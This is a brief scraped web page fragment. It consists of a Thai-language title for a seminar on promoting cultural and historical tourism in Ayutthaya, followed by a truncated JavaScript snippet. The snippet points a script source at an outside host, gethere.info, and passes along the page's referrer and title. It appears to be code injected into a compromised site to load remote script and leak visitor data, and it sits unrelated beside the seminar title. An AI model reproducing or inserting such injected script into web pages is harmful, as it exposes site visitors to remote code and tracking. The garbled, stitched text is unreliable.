การเสวนา เรื่อง “การส่งเสริมการท่องเที่ยวเชิงวัฒนธรรมและประวัติศาสตร์ นครประวัติศาสตร์พระนครศรีอยุธยา”

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; if (document.currentScript) {